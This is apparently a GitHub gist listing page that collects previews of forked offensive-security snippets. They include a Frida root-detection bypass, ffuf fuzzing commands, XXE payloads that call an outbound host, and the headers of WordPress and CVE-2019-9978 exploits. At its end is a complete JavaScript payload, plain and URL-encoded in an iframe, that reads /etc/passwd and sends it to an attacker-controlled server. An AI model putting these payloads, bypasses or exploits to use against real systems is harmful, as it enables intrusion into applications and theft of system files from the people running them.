heh@cks hehacks
hehacks
/ a_ios_introspection.md
Created
August 9, 2023 05:52
— forked from rustymagnet3000/ios_introspection.md
Static and Dynamic iOS inspection
hehacks
/ root_bypass.js
Created
February 25, 2021 13:02
— forked from pich4ya/root_bypass.js
Bypass Android Root Detection / Bypass RootBeer - August 2019
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // $ frida -l antiroot.js -U -f com.example.app --no-pause | |
| // CHANGELOG by Pichaya Morimoto ([email protected]): | |
| // - I added extra whitelisted items to deal with the latest versions | |
| // of RootBeer/Cordova iRoot as of August 6, 2019 | |
| // - The original one just fucked up (kill itself) if Magisk is installed lol | |
| // Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/ | |
| // If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so | |
| Java.perform(function() { | |
| var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu", |
hehacks
/ ffuf_oneline.sh
Created
September 18, 2020 13:22
— forked from InsiderPhD/ffuf_oneline.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Basic Usage | |
| ffuf -w wordlist.txt -u http://127.0.0.1:8000/api/FUZZ/6 -o output.txt -replay-proxy http://127.0.0.1:8080 | |
| # Basic Usage With a Cookie | |
| ffuf -w wordlist.txt -u http://127.0.0.1:8000/api/FUZZ/6 -o output.txt -replay-proxy http://127.0.0.1:8080 -b "laravel_session=eyJpdiI6Ii8wQU11dTVlUkg2alRHUXBIVzlGSnc9PSIsInZhbHVlIjoiOWs3YllJWTdqNC9xa1pMeFRvMFh0OE1vRFpaWm9GSzFkRktVZS9yUHBDM0lIazZ4K0NsbndxWVIxQ05VZWhqZUZaR0RGQWlFdmdDc24yWllYRklGSXI5STd2b05Pam4yRXIwV1BUWkZhUnFLNUFzOWsycmRHcnlxS0FqRWNsSnEiLCJtYWMiOiI3ZTliMmM2YzIxOTExNDE0NmVjYTYyMGI4Nzg4YzJiYjNmNjVkNDI1YzEyODYwMzY5YzczNzY3NTUwZDk0OGYzIn0%3D;" | |
| # Adding a delay | |
| ffuf -w wordlist.txt -u http://127.0.0.1:8000/api/FUZZ/6 -o output.txt -replay-proxy http://127.0.0.1:8080 –p 1 –t 3 | |
| # Adding a delay (new method) |
hehacks
/ extract-ipa.sh
Created
September 5, 2020 07:11
— forked from oszo/extract-ipa.sh
IPA extract script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| if [ ! -z "$1" -a "$1" != " " ] | |
| then | |
| EXTRACT_APP_PATH=$1 | |
| # echo $EXTRACT_APP_PATH | |
| if [ -d "$EXTRACT_APP_PATH" ] | |
| then | |
| EXTRACT_APP_NAME="$(ls $1/ | grep .app)" | |
| # echo $EXTRACT_APP_NAME | |
| if [ ! -z "$EXTRACT_APP_NAME" -a "$EXTRACT_APP_NAME" != " " ] | |
| then |
hehacks
/ XXE_payloads
Created
July 31, 2020 18:03
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
hehacks
/ wordpress_content_injection.py
Created
July 14, 2020 07:59
— forked from budanthara/wordpress_content_injection.py
Wordpress content injection exploit by snoww0lf
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/env python | |
| """ | |
| Technical Explanation: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html | |
| REST API Wordpress reference: https://developer.wordpress.org/rest-api/reference/posts/#update-a-post | |
| Wordpress Version Affected: 4.7.0/4.7.1 | |
| 2017 - Coded by snoww0lf. | |
| """ | |
| import re |
hehacks
/ CVE-2019-9978.py
Created
July 14, 2020 07:59
— forked from budanthara/CVE-2019-9978.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Title: RCE in Social Warfare Plugin Wordpress ( <=3D3.5.2 ) | |
| # Date: March, 2019 | |
| # Researcher: Luka Sikic | |
| # Exploit Author: hash3liZer | |
| # Download Link: https://wordpress.org/plugins/social-warfare/ | |
| # Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=3DIwAR2xLSnan=ccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM | |
| # Github: https://github.com/hash3liZer/CVE-2019-9978 | |
| # Version: <=3D 3.5.2 | |
| # CVE: CVE-2019-9978 |
hehacks
/ gist:158a2953d33d4c40713b72a5cc20d7e8
Created
July 8, 2020 11:50
— forked from evilpacket/gist:3628941
Top 1000 from Alexa Top 1million
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wget -q http://s3.amazonaws.com/alexa-static/top-1m.csv.zip;unzip top-1m.csv.zip; awk -F ',' '{print $2}' top-1m.csv|head -1000 > top-1000.txt; rm top-1m.csv* |
hehacks
/ aws-dangling-domain-discovery-tool.sh
Created
June 24, 2020 19:38
— forked from dafthack/aws-dangling-domain-discovery-tool.sh
A proof of concept script for discovering AWS dangling domains
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # This script attempts to locate potential dangling domains on AWS. You need AWS CLI installed and your keys configured | |
| # Make sure you insert your Bing API key below as well. | |
| # All the sleeps were necessary to not allocate the same IP address multiple times | |
| while true | |
| do | |
| unset IP |
x=new XMLHttpRequest;x.onload=function(){l=new XMLHttpRequest;l.open("GET","http://<ATTACKER-SERVER>:1337/"+encodeURIComponent(this.responseText));l.send();};x.open("GET","file:///etc/passwd");x.send();<iframe src="javascript:%78%3d%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%3b%78%2e%6f%6e%6c%6f%61%64%3d%66%75%6e%63%74%69%6f%6e%28%29%7b%6c%3d%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%3b%6c%2e%6f%70%65%6e%28%22%47%45%54%22%2c%22%68%74%74%70%3a%2f%2f%78%2e%78%78%65%2e%73%68%3a%31%33%33%37%2f%22%2b%65%6e%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%74%68%69%73%2e%72%65%73%70%6f%6e%73%65%54%65%78%74%29%29%3b%6c%2e%73%65%6e%64%28%29%3b%7d%3b%78%2e%6f%70%65%6e%28%22%47%45%54%22%2c%22%66%69%6c%65%3a%2f%2f%2f%65%74%63%2f%70%61%73%73%77%64%22%29%3b%78%2e%73%65%6e%64%28%29%3b%0a"></iframe>NewerOlder